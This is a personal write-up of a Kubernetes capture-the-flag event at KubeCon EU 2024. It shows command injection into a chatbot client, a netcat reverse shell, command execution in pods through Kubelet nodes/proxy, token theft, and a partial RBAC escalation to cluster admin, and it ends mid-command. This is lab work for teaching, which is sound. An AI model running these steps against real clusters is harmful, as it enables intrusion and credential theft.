KubeCon EU 2024 CTF Writeup

Introduction

Once again, ControlPlane ran a Kubernetes CTF at KubeCon EU 2024. I always enjoy taking part in these, as they put together some really good challenges. As usual there were three challenges, and this post goes over how I approached each of them.

Challenge 1 - Demanding Deployments

Let’s get started. SSHing into the first challenge gives us the following message:

Okay, I think we're back up and running again after that hack. I've managed to restore enough systems that we can redeploy, and added some hardening to the Kubernetes cluster so we don't get hacked again.

The Git repo is available again, I've had to restore from a very old backup. It's talking to Tekton, so any commits you make will automatically be applied, but the pipelines are currently failing. Could you go and look at this, we need to get back online ASAP.

As a reminder, here are the URLs you need:

Gitea

https://git.kubesim.tech:8443

Username: developer

I'm sure you can guess the password

Tekton

https://tekton.kubesim.tech:8443

No credentials needed here.

You'll need to jump through our Bastion to access there, here's the command you'll need:

ssh -L 8443:bastion.kubesim.tech:8443 -F simulator_config bastion

Ignore the certificate warnings, new certificates are being provisioned.

You also have enough permissions in the production namespace to troubleshoot why the app isn't running using Kubectl from the jumphost.

First, we need to redo our SSH connection to include the port forwarding. We also need to add tekton.kubesim.tech and git.kubesim.tech to our /etc/hosts, pointing at 127.0.0.1 so that requests go through the forwarded port.

Once that is done, we are greeted with Gitea and Tekton instances.

Excellent. A good starting point seems to be logging in to Gitea. Going by the message above, the username is developer and the password should be guessable. Let’s try password.

Awesome, we’re in.



There is a repository called production-development with two commits. Let’s check that repository out, including its earlier commit, in case anything was deleted.

It looks like they deleted a production-secret.yaml file from the repository. It contained:

apiVersion: v1
data:
  username: YWRtaW4=
  password: Y29ycmVjdC1ob3JzZS1iYXR0ZXJ5LXN0YXBsZQ==
  flag:
kind: Secret
metadata:
  name: database-credentials
  namespace: production

A fun set of credentials: admin:correct-horse-battery-staple (for those who don’t get the reference, it’s from xkcd 936, “Password Strength”). However, the flag field is empty. It may be populated in the Secret resource in the cluster.
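The values under data are only base64-encoded, not encrypted, so anyone who can read the manifest can read the credentials. Here is a minimal Python sketch that decodes the two populated values from the deleted file:

```python
import base64

# Values copied from the deleted production-secret.yaml
SECRET_DATA = {
    "username": "YWRtaW4=",
    "password": "Y29ycmVjdC1ob3JzZS1iYXR0ZXJ5LXN0YXBsZQ==",
}


def decode_secret_data(data: dict[str, str]) -> dict[str, str]:
    """Base64-decode every value in a Secret's data field."""
    return {key: base64.b64decode(value).decode("utf-8") for key, value in data.items()}


if __name__ == "__main__":
    for key, value in decode_secret_data(SECRET_DATA).items():
        print(f"{key}: {value}")
```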

There is also a Dockerfile and a production manifest containing the following:

FROM ubuntu:16.04
RUN apt -y update
RUN apt -yq upgrade
RUN apt install -yq python-3
# This is where the Python code will eventually go
# Remember to set the database password as an environment variable
ENV database_password ThisIsWhereThePasswordWillGo
CMD ["/bin/bash", "-c", "while true; do echo $database_password; sleep 120; done;"]

apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: production-workload
  name: world-saving-app
  namespace: productoin
spec:
  replicas: 1
  selector:
    matchLabels:
      app: production-workload
  strategy: {}
  template:
    metadata:
      labels:
        app: production-workload
    spec:
      containers:
      - image: registry.kubesim.tech/development/production-app:latest
        name: registry-kubesim-tech-nqrt8
        resources: {}
status: {}

Tekton is a CI/CD tool, so we probably need to gain a foothold in the environment by committing to this repo. The message we got when SSHing in points the same way. It also said we had enough permissions in production to troubleshoot, so let’s see what those permissions are.

root@jumphost:~# kubectl -n production auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

events [] [] [get list]

namespaces [] [] [get list]

pods/log [] [] [get list]

pods [] [] [get list]

deployments.apps [] [] [get list]

replicasets.apps [] [] [get list]

[..SNIP..]

So we mainly have read permissions on workloads and pod logs. That means any data we want to exfiltrate has to be written to stdout so we can retrieve it through the logs.

Let’s start making the relevant changes to the repository. Rather than paste every iteration, here is the list of changes I made:

- Mounted the secret containing the flag as a volume
- Changed python-3 to python3 in the Dockerfile
- Fixed the typo of production in the namespace
- Complied with the restricted Pod Security Standard
- Printed the flag to stdout
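For reference, here is a small checker for the container-level securityContext rules of the restricted Pod Security Standard that these changes had to satisfy. This is a simplified sketch, not the real Pod Security Admission logic. It only looks at one container's securityContext. The real check also accepts some of these fields at pod level and covers volume types, host namespaces and more.

```python
# Values the restricted profile accepts for seccompProfile.type
ALLOWED_SECCOMP_TYPES = {"RuntimeDefault", "Localhost"}


def restricted_violations(security_context: dict) -> list[str]:
    """Check one container securityContext against the restricted profile.

    Simplified: pod-level securityContext and non-securityContext rules
    (volumes, host namespaces, ...) are not inspected.
    """
    problems = []
    if security_context.get("runAsNonRoot") is not True:
        problems.append("runAsNonRoot must be true")
    if security_context.get("runAsUser") == 0:
        problems.append("runAsUser must not be 0")
    if security_context.get("allowPrivilegeEscalation") is not False:
        problems.append("allowPrivilegeEscalation must be false")
    capabilities = security_context.get("capabilities", {})
    if "ALL" not in capabilities.get("drop", []):
        problems.append("capabilities.drop must include ALL")
    if set(capabilities.get("add", [])) - {"NET_BIND_SERVICE"}:
        problems.append("only NET_BIND_SERVICE may be added")
    if security_context.get("seccompProfile", {}).get("type") not in ALLOWED_SECCOMP_TYPES:
        problems.append("seccompProfile.type must be RuntimeDefault or Localhost")
    return problems


# securityContext from the final manifest
FINAL_SECURITY_CONTEXT = {
    "runAsNonRoot": True,
    "runAsUser": 1000,
    "allowPrivilegeEscalation": False,
    "seccompProfile": {"type": "RuntimeDefault"},
    "capabilities": {"drop": ["ALL"]},
}

if __name__ == "__main__":
    print(restricted_violations({}))  # the original container had no securityContext
    print(restricted_violations(FINAL_SECURITY_CONTEXT))  # []
```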

After each change, I waited for Tekton to build, then checked the pipeline output or the resources in Kubernetes for errors to figure out the next step. The final manifest and Dockerfile looked as follows:

apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: production-workload
  name: world-saving-app
  namespace: production
spec:
  replicas: 1
  selector:
    matchLabels:
      app: production-workload
  strategy: {}
  template:
    metadata:
      labels:
        app: production-workload
    spec:
      volumes:
      - name: flag
        secret:
          secretName: database-credentials
      containers:
      - image: registry.kubesim.tech/development/production-app:latest
        name: registry-kubesim-tech-nqrt8
        args: ["find", "/flag", "-type", "f", "-exec", "cat", "{}", ";"]
        resources: {}
        securityContext:
          runAsNonRoot: true
          runAsUser: 1000
          allowPrivilegeEscalation: false
          seccompProfile:
            type: RuntimeDefault
          capabilities:
            drop:
            - ALL
        volumeMounts:
        - name: flag
          mountPath: /flag/
status: {}

FROM ubuntu:16.04
RUN apt -y update
RUN apt -yq upgrade
RUN apt install -yq python3
# This is where the Python code will eventually go
# Remember to set the database password as an environment variable
ENV database_password ThisIsWhereThePasswordWillGo
CMD ["/bin/bash", "-c", "while true; do echo $database_password; sleep 120; done;"]

This resulted in the first flag being found within the logs:

root@jumphost:~# kubectl -n production logs world-saving-app-ccdb4c45b-952r7

correct-horse-battery-stapleflag_ctf{hardening-is-harder-than-hacking}
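The find override does a bit more than it looks. Each key in a secret volume is a symlink (via ..data) to a file in a hidden, timestamped directory. find -type f (without -L) skips the symlinks and cats each real file once. Here is a Python sketch of the same idea, run against a mock layout whose directory name is hypothetical:

```python
import os
import tempfile


def collect_regular_files(root: str) -> list[bytes]:
    """Read every regular file under root, like `find root -type f -exec cat {} ;`.

    Symlinked files are skipped, as `find -type f` skips them without -L,
    and os.walk does not descend into symlinked directories by default.
    """
    contents = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            with open(path, "rb") as handle:
                contents.append(handle.read())
    return contents


def demo() -> list[bytes]:
    """Build a mock secret-volume layout (hypothetical names) and read it back."""
    with tempfile.TemporaryDirectory() as root:
        real_dir = os.path.join(root, "..2024_03_28_09_18_00.000000000")
        os.mkdir(real_dir)
        with open(os.path.join(real_dir, "flag"), "wb") as handle:
            handle.write(b"flag_ctf{example}")
        # ..data -> timestamped dir, and flag -> ..data/flag, as in a real secret volume
        os.symlink(os.path.basename(real_dir), os.path.join(root, "..data"))
        os.symlink(os.path.join("..data", "flag"), os.path.join(root, "flag"))
        return collect_regular_files(root)


if __name__ == "__main__":
    print(demo())
```

The decoded secret values have no trailing newline, so cat output runs together. That is likely why the password and flag appear glued together in the log above.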

I then spent a bit of time enumerating the cluster further, adding more tools and testing what I could deploy through Tekton. I didn’t immediately find a route to the bonus flag, and since it was only worth 5 points, I decided to leave it and come back after finishing the rest of the challenges.

However, before I could come back to it, ControlPlane went over this challenge in the room, so I ended up learning how to get the bonus flag.

They pointed out that the message said the system had been redeployed after a hack, so it was likely set up in a hurry. The Gitea Helm chart has a default password for the gitea_admin account, which is r8sA8CPHD9!bt6d. Logging into this account reveals a second, hidden repository containing the flag:

flag_ctf{you_should_change_your_default_passwords}

Challenge 2 - Garnet Gambit

Connecting to this instance, we are immediately greeted by a Chatbot.

$ ssh -F simulator_config bastion

Welcome to the chatbot service. This system is intended for authorized test users only. Individuals who are not part of the LLM development team should not continue to use this server. If you are not part of the team, terminate access now and contact Information Security. How did you even find this service? It's meant to be restricted.

Welcome to the chatbot interface

_____ _ _ _ _

/ ____| | | | | | | |

| | | |__ __ _| |_| |__ ___ | |_

| | | '_ \ / _` | __| '_ \ / _ \| __|

| |____| | | | (_| | |_| |_) | (_) | |_

\_____|_| |_|\__,_|\__|_.__/ \___/ \__|

Launch information:

Running chatbot client from location: /bin/chatbot

Error loading latest training data. Please check if it's on the Kubernetes nodes in /tmp/llm

Chatbot Server: 10.97.254.177

Enter a message to start your conversation

User:

LLM? Is this going to be a weird prompt injection challenge? After chatting with it for a bit, though, it doesn’t appear to be a proper LLM. I guess that explains the error message about failing to load the training data.

User: hi

Chatbot: Hold onto your hats, kiddos! We're about to blast off into the stratosphere of cyber shenanigans!

User: hows it going

Chatbot: Hold onto your hats, kiddos! We're about to blast off into the stratosphere of cyber shenanigans!

User: what else can you do

Chatbot: Well butter my circuits and call me a toaster! We're in for a wild ride through the motherboard of mayhem!

User: flag

Chatbot: Did you really think it would be this easy?

This feels more like a chatbot with predetermined responses than an LLM, so there’s no need for prompt injection. Let’s see if there’s a help command or something similar.

User: help

Chatbot client. Use it to chat with the chatbot. Enter 'debug' for debugging.

User: debug

Debugging enabled.

Oooh, a debug mode, that’s interesting. Let’s see what we can do with that.

User: hi

DEBUG: Running command bash -c curl -s -XPOST http://10.97.254.177:8080/chat -d '{"message": "hi"}'

Chatbot: Hold onto your hats, or whatever it is you humans hold onto when things get exciting. We're about to redefine 'impossible'!

OK, so it’s just sending a POST request to another service, with our input placed in the message field of the JSON payload. Let’s see if we can break out of that and inject our own shell commands.

User: "}'; id

DEBUG: Running command bash -c curl -s -XPOST http://10.97.254.177:8080/chat -d '{"message": ""}'; id"}'

That gave me an error, because the leftover characters after id leave an unmatched double quote:

exit status 2

Chatbot: bash: -c: line 1: unexpected EOF while looking for matching `"'

bash: -c: line 2: syntax error: unexpected end of file

User: "}'; id; #

DEBUG: Running command bash -c curl -s -XPOST http://10.97.254.177:8080/chat -d '{"message": ""}'; id; #"}'

Chatbot: Well, slap my space bar and call me a keyboard! We're about to jack into the matrix of mischief!uid=0(root) gid=0(root) groups=0(root)
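The debug output suggests the client drops our message straight into a JSON string inside a bash -c command line, so a quote in the input ends the argument early. The client's real source isn't shown, so the vulnerable function below is a hypothetical Python reconstruction. It sits alongside two safer ways to build the same request:

```python
import json
import shlex

# Chatbot server endpoint taken from the debug output
CHAT_URL = "http://10.97.254.177:8080/chat"


def vulnerable_command(message: str) -> str:
    """Hypothetical reconstruction: user input spliced straight into a bash -c string."""
    return f"curl -s -XPOST {CHAT_URL} -d '{{\"message\": \"{message}\"}}'"


def quoted_command(message: str) -> str:
    """Serialise the body with json.dumps, then quote it as one shell word."""
    body = json.dumps({"message": message})
    return f"curl -s -XPOST {CHAT_URL} -d {shlex.quote(body)}"


def argv_command(message: str) -> list[str]:
    """Better still: no shell at all, suitable for subprocess.run(argv)."""
    return ["curl", "-s", "-XPOST", CHAT_URL, "-d", json.dumps({"message": message})]


if __name__ == "__main__":
    payload = "\"}'; id; #"
    # The single quote closes early, so `id` runs as a separate shell command
    print(vulnerable_command(payload))
    # The whole JSON body stays a single argument to curl
    print(quoted_command(payload))
    print(argv_command(payload))
```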

Nice, so we can execute arbitrary commands, and we’re running as root in whatever container this is. Let’s establish a reverse shell and start enumerating. I did this by installing netcat and running nc -e. I won’t give the full log, but the injected commands were:

apt update

apt install -y netcat-traditional

nc -e /bin/bash IP PORT

Success, we have a reverse shell, which saves us from wrapping every command in the injection payload.

$ nc -nlvp 8080

Listening on 0.0.0.0 8080

Connection received on 18.175.20.148 4994

id

uid=0(root) gid=0(root) groups=0(root)

Enumerating, we quickly find a flag in /root/flag/.

ls -l /root/flag/

total 0

lrwxrwxrwx 1 root root 11 Mar 28 09:18 flag -> ..data/flag

cat /root/flag/flag

flag_ctf{should_have_parameterised_those_inputs}

However, submitting this to the leaderboard reveals it’s the second flag, not the first. We must have missed a flag somewhere, probably in the chatbot itself. We can come back to that later.

Let’s do some more enumeration for now. The permissions the service account has look interesting:

kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

*.* [] [node-1] [get create patch list]

*.* [] [node-2] [get create patch list]

namespaces [] [] [get list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

Notably, there are *.* permissions on node-1 and node-2. I’m guessing these are nodes, but let’s check whether any secrets, pods or other resources have those names. We can’t list them, but we can try getting individual resources, just in case ControlPlane are being sneaky.

After a few checks, it looks like these are just the nodes.

kubectl get node node-1 node-2

NAME STATUS ROLES AGE VERSION

node-1 Ready <none> 155m v1.28.7

node-2 Ready <none> 155m v1.28.7

So we have get, create, patch and list on nodes. I wonder what we can do with those. After a quick search, I’m reminded that *.* covers more than the node objects themselves. It also includes subresources such as nodes/proxy. nodes/proxy is the permission that grants access to the Kubelet API, and the RBAC verb checked depends on the HTTP method of the request (GET maps to get, POST maps to create). There is a known attack that relies on get and create against nodes/proxy: get lets you list the pods and containers on a node, and create lets you execute commands inside those containers. In this instance, that means code execution in any pod running on node-1 or node-2.
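The Kubelet's mapping from an API request to an RBAC check, as documented for its webhook authorization mode, can be sketched as a small Python function. Newer Kubernetes releases can split some paths into finer-grained subresources behind a feature gate. Treat this as a sketch of the classic behaviour relevant to this v1.28 cluster:

```python
# HTTP method -> RBAC verb the Kubelet asks the API server to authorise
METHOD_TO_VERB = {
    "POST": "create",
    "GET": "get",
    "HEAD": "get",
    "PUT": "update",
    "PATCH": "patch",
    "DELETE": "delete",
}

# Kubelet path prefix -> subresource of "nodes"; any other path maps to "proxy"
PREFIX_TO_SUBRESOURCE = {
    "/stats": "stats",
    "/metrics": "metrics",
    "/logs": "log",
    "/spec": "spec",
}


def kubelet_authz_attributes(method: str, path: str) -> tuple[str, str, str]:
    """Return (verb, resource, subresource) checked for a Kubelet API request."""
    verb = METHOD_TO_VERB[method.upper()]
    for prefix, subresource in PREFIX_TO_SUBRESOURCE.items():
        if path == prefix or path.startswith(prefix + "/"):
            return verb, "nodes", subresource
    return verb, "nodes", "proxy"


if __name__ == "__main__":
    print(kubelet_authz_attributes("GET", "/pods"))  # ('get', 'nodes', 'proxy')
    print(kubelet_authz_attributes("POST", "/run/default/some-pod/some-container"))  # ('create', 'nodes', 'proxy')
```

This is why get and create are the interesting pair: listing pods is a GET and /run is a POST, and both land on nodes/proxy.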

Let’s give that a go. First, we need the nodes’ IPs, which we can get with a simple -o wide.

kubectl get node node-1 node-2 -o wide

NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME

node-1 Ready <none> 157m v1.28.7 10.0.179.42 <none> Ubuntu 22.04.3 LTS 6.2.0-1015-aws containerd://1.7.7

node-2 Ready <none> 157m v1.28.7 10.0.154.143 <none> Ubuntu 22.04.3 LTS 6.2.0-1015-aws containerd://1.7.7

I’m assuming the Kubelet is listening on its default port, 10250. If that’s not the case, we can query the node with -o yaml and read the port from status.daemonEndpoints.kubeletEndpoint.Port.
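If the port did need checking, here is a minimal Python sketch that pulls the InternalIP and Kubelet port out of kubectl get node -o json output. The sample object is heavily trimmed, and its port value is an assumption:

```python
def kubelet_endpoint(node: dict) -> tuple[str, int]:
    """Return (InternalIP, Kubelet port) from a Node object (kubectl get node NAME -o json)."""
    status = node["status"]
    internal_ip = next(
        address["address"] for address in status["addresses"] if address["type"] == "InternalIP"
    )
    port = status["daemonEndpoints"]["kubeletEndpoint"]["Port"]
    return internal_ip, port


# Heavily trimmed, illustrative Node object; the port value here is an assumption
SAMPLE_NODE = {
    "metadata": {"name": "node-1"},
    "status": {
        "addresses": [{"type": "InternalIP", "address": "10.0.179.42"}],
        "daemonEndpoints": {"kubeletEndpoint": {"Port": 10250}},
    },
}

if __name__ == "__main__":
    print(kubelet_endpoint(SAMPLE_NODE))
```

In practice you would save kubectl get node node-1 -o json to a file and json.load it instead of using the sample.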

curl -k https://10.0.179.42:10250

404 page not found

We get a response, so something is listening. Let’s try listing the pods.

curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://10.0.179.42:10250/pods

{"kind":"PodList","apiVersion":"v1","metadata":{},"items":[ [...SNIP...]

I won’t paste the entire output as it’s unwieldy, but it worked. Saving the output locally and passing it through jq makes it a bit more readable. We can repeat this on the other node to get all containers running on both nodes.

Of particular note is the chatbot server, which has CHATBOT_SERVER_FLAG mounted as an environment variable.

"name": "chatbot",
"image": "controlplaneoffsec/chatbot:server",
"env": [
  {
    "name": "CHATBOT_SERVER_FLAG",
    "valueFrom": {
      "secretKeyRef": {
        "name": "server-flag",
        "key": "flag"
      }
    }
  }
],
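As an alternative to jq, a short Python sketch can walk the saved /pods output and flag any environment variables sourced from Secrets. The sample PodList is trimmed from the chatbot pod in this output. load_pod_list assumes you’ve saved the curl output to a local file:

```python
import json


def list_containers(pod_list: dict) -> list[tuple[str, str, str]]:
    """Return (namespace, pod, container) for every container in a PodList."""
    return [
        (pod["metadata"]["namespace"], pod["metadata"]["name"], container["name"])
        for pod in pod_list.get("items", [])
        for container in pod["spec"].get("containers", [])
    ]


def secret_env_refs(pod_list: dict) -> list[tuple[str, str, str, str, str]]:
    """Return (namespace, pod, container, env var, secret) for env vars sourced from Secrets."""
    hits = []
    for pod in pod_list.get("items", []):
        meta = pod["metadata"]
        for container in pod["spec"].get("containers", []):
            for env in container.get("env", []):
                ref = env.get("valueFrom", {}).get("secretKeyRef")
                if ref:
                    hits.append((meta["namespace"], meta["name"], container["name"], env["name"], ref["name"]))
    return hits


def load_pod_list(path: str) -> dict:
    """Load the JSON saved from the Kubelet's /pods endpoint."""
    with open(path) as handle:
        return json.load(handle)


# Trimmed PodList built from the chatbot pod shown in this section
SAMPLE_POD_LIST = {
    "kind": "PodList",
    "items": [
        {
            "metadata": {"name": "chatbot-7fcf7bfc64-rn2vh", "namespace": "default"},
            "spec": {
                "containers": [
                    {
                        "name": "chatbot",
                        "image": "controlplaneoffsec/chatbot:server",
                        "env": [
                            {
                                "name": "CHATBOT_SERVER_FLAG",
                                "valueFrom": {"secretKeyRef": {"name": "server-flag", "key": "flag"}},
                            }
                        ],
                    }
                ]
            },
        }
    ],
}

if __name__ == "__main__":
    print(list_containers(SAMPLE_POD_LIST))
    print(secret_env_refs(SAMPLE_POD_LIST))
```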

Let’s run env in that container to get the flag. To do this, we need the namespace, pod name and container name. The container name is chatbot, as seen above, and we can get the other details from the pod’s metadata.

"metadata": {
  "name": "chatbot-7fcf7bfc64-rn2vh",
  "generateName": "chatbot-7fcf7bfc64-",
  "namespace": "default",
  "uid": "bb3c839a-e6d9-415d-a2a4-c881e11d39b0",
  "resourceVersion": "703",
  "creationTimestamp": "2024-03-28T09:18:21Z",
  "labels": {
    "app": "chatbot",
    "pod-template-hash": "7fcf7bfc64"
  },
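The Kubelet’s /run endpoint takes the namespace, pod and container as path segments and the command as a form field named cmd. Here is a Python sketch that builds (but does not send) the same request as the curl command, using a placeholder token:

```python
import urllib.parse
import urllib.request


def kubelet_run_request(node_ip: str, namespace: str, pod: str, container: str,
                        cmd: str, token: str, port: int = 10250) -> urllib.request.Request:
    """Build a POST to the Kubelet's /run/<namespace>/<pod>/<container> endpoint."""
    segments = (urllib.parse.quote(part, safe="") for part in (namespace, pod, container))
    path = "/run/" + "/".join(segments)
    body = urllib.parse.urlencode({"cmd": cmd}).encode()  # form-encoded, like curl -d
    return urllib.request.Request(
        f"https://{node_ip}:{port}{path}",
        data=body,
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/x-www-form-urlencoded",
        },
        method="POST",
    )


if __name__ == "__main__":
    req = kubelet_run_request("10.0.179.42", "default", "chatbot-7fcf7bfc64-rn2vh",
                              "chatbot", "env", token="PLACEHOLDER")
    print(req.get_method(), req.full_url, req.data)
```

Sending it with urllib.request.urlopen would also need an ssl.SSLContext with check_hostname disabled and verify_mode set to ssl.CERT_NONE, the equivalent of curl -k here.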

We can now execute the command with the following:

curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://10.0.179.42:10250/run/default/chatbot-7fcf7bfc64-rn2vh/chatbot -d cmd=env

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

HOSTNAME=chatbot-7fcf7bfc64-rn2vh

CHATBOT_SERVER_FLAG=flag_ctf{I_for_one_welcome_our_new_robot_overlords}

KUBERNETES_PORT=tcp://10.96.0.1:443

KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1

CHATBOT_PORT_8080_TCP_ADDR=10.97.254.177

CHATBOT_PORT_8080_TCP_PORT=8080

KUBERNETES_SERVICE_HOST=10.96.0.1

KUBERNETES_SERVICE_PORT_HTTPS=443

KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443

KUBERNETES_PORT_443_TCP_PROTO=tcp

KUBERNETES_PORT_443_TCP_PORT=443

CHATBOT_PORT_8080_TCP_PROTO=tcp

CHATBOT_SERVICE_PORT=8080

KUBERNETES_SERVICE_PORT=443

CHATBOT_SERVICE_HOST=10.97.254.177

CHATBOT_PORT_8080_TCP=tcp://10.97.254.177:8080

CHATBOT_PORT=tcp://10.97.254.177:8080

HOME=/root

Submitting that flag, it turns out to be the first flag. Afterwards, ControlPlane revealed that the intended way to get this flag was to say please to the chatbot 😂 The eventual AI overlords may have an issue with me for not saying please to the bots. Problem for later.

Doing some further enumeration through a reverse shell in that pod doesn’t reveal much more.

Going back to the container lists, another container in the kube-system namespace does stand out.

"name": "kubectl",
"image": "bitnami/kubectl",
"command": [
  "sleep",
  "infinity"
],

It’s not common to see pods running just a kubectl image; they’re usually debug pods. The pod name, monitoring-866b58796b-qbtl4, suggests it’s used for monitoring. kube-system is also a highly privileged namespace, so I wonder what permissions this pod has. Let’s grab its service account token.

curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://10.0.179.42:10250/run/kube-system/monitoring-866b58796b-qbtl4/kubectl -d cmd="cat /var/run/secrets/kubernetes.io/serviceaccount/token"

eyJhbGciOiJSUzI1NiIsImtpZCI6IllwS3V2bHJuTndkN0FkejNfWC1MaTNVTDJra1FQOXc1TGZBc2k5MDE0akUifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQzMTYyMjAyLCJpYXQiOjE3MTE2MjYyMDIsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsInBvZCI6eyJuYW1lIjoibW9uaXRvcmluZy04NjZiNTg3OTZiLXFidGw0IiwidWlkIjoiYTY3ZTVhMWYtMmUyZC00MzQ3LTk0ZjMtNGU2MGUwZTg2NTgzIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJkZWZhdWx0IiwidWlkIjoiMzgwNDliNjgtMDU3MS00ZThiLWFmN2QtNzgxYWUwYzdlNDI4In0sIndhcm5hZnRlciI6MTcxMTYyOTgwOX0sIm5iZiI6MTcxMTYyNjIwMiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50Omt1YmUtc3lzdGVtOmRlZmF1bHQifQ.SWs8_hIRJnMN8sMVPsnp7Q06kTTpqreTOdN8tPfTjgkj7u4qy54Pd5FAyQfHYbmWLByUb1vT318WtLTmWwY36eulNqVszPnRWJ64QAJPVLMl4HrZXKf9xKiq0VSuWQMEq3kqr7sL5N_v1OQPVbBbHi-emqKHmSm8ZMCUg7X2uPqkddp2htNRDVJRSrms6FRqDH6m4hZ1rfRdeoqgV9IWJ1LINyNgrtmOP4sPe4Rz6AjMj4s3RSo5eBdxXYpbxP7ttbk_xsXDSWVwz9TSoI9-528DergQe_Dz8K1FYTd_ZontBxGgYg43bCSdQvgRzIeFrF9Uu7HiqR49rJcQIGzThw

Now we can run auth can-i --list with the token. As I’m in a fairly limited shell, I can’t easily alias it into my commands, so I’ll just keep pasting the token into each kubectl command.

kubectl --token=ey[..SNIP..] auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

[..SNIP..]

There’s nothing notable in our current namespace, which suggests it’s not cluster admin. Let’s try the kube-system namespace.

kubectl --token=ey[..SNIP..] -n kube-system auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

*.* [] [] [*]

[*] [] [*]

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

[..SNIP..]

Nice, it has full admin within the kube-system namespace. We can trivially use this to escalate to cluster admin via the clusterrole-aggregation-controller service account, which lives in this namespace and typically has the escalate verb on cluster roles. We can get a token for it with kubectl create token.

kubectl --token=ey[..SNIP..] -n kube-system create token clusterrole-aggregation-controller

eyJhbGciOiJSUzI1NiIsImtpZCI6IllwS3V2bHJuTndkN0FkejNfWC1MaTNVTDJra1FQOXc1TGZBc2k5MDE0akUifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzExNjMxNjQ0LCJpYXQiOjE3MTE2MjgwNDQsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJjbHVzdGVycm9sZS1hZ2dyZWdhdGlvbi1jb250cm9sbGVyIiwidWlkIjoiN2NjYzc5N2QtYjM1Zi00YTY0LWEzZjAtYzliZjQ5NTAyZGExIn19LCJuYmYiOjE3MTE2MjgwNDQsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDprdWJlLXN5c3RlbTpjbHVzdGVycm9sZS1hZ2dyZWdhdGlvbi1jb250cm9sbGVyIn0.IvDPENA0j0D_IfkSY2YSRqb0ZHfGKDc5S87YlCkjVDiT26yhmT6qOdHSF_znNPS7PL6-d8p3P2-dlSSyMe_slNcqAU7_6SqLIpHGLFJgq6aMjYXrTv7Qh4Nr8Rbbam0QklZVNmIHA6nXc_r1S7IEqMvIca6z3SG7bMcOLbsUlQyXduk-4YrjNzCrRQ3UJSx6CPZhVLTbQkOPkAxD2lfZZNFW6YNWVBOCxyUYTK563Yso7gbIMkMuj19YdGYLyaMljQue6x2CVkPElPTlMk1-tpo-Xea5l6riXIqGZL3NZAsbmqb1CvK9VrBntnPKQgSoEVJPzEMrpRUOUF1D-JvrHg

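We can now use this token to modify the system:controller:clusterrole-aggregation-controller cluster role and give ourselves cluster admin. The escalate verb is what makes this possible: RBAC normally refuses to let you grant permissions you don’t already hold, and escalate lifts that restriction.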

kubectl --token=eyJ[..SNIP..] -n kube-system get clusterrole system:controller:clusterrole-aggregation-controller -o yaml

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  annotations:
    rbac.authorization.kubernetes.io/autoupdate: "true"
  creationTimestamp: "2024-03-28T09:17:47Z"
  labels:
    kubernetes.io/bootstrapping: rbac-defaults
  name: system:controller:clusterrole-aggregation-controller
  resourceVersion: "141"
  uid: 38e63279-4493-42f4-9ad6-3193918fab37
rules:
- apiGroups:
  - rbac.authorization.k8s.io
  resources:
  - clusterroles
  verbs:
  - escalate
  - get
  - list
  - patch
  - update
  - watch

cat > /tmp/crb.yml <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  annotations:
    rbac.authorization.kubernetes.io/autoupdate: "true"
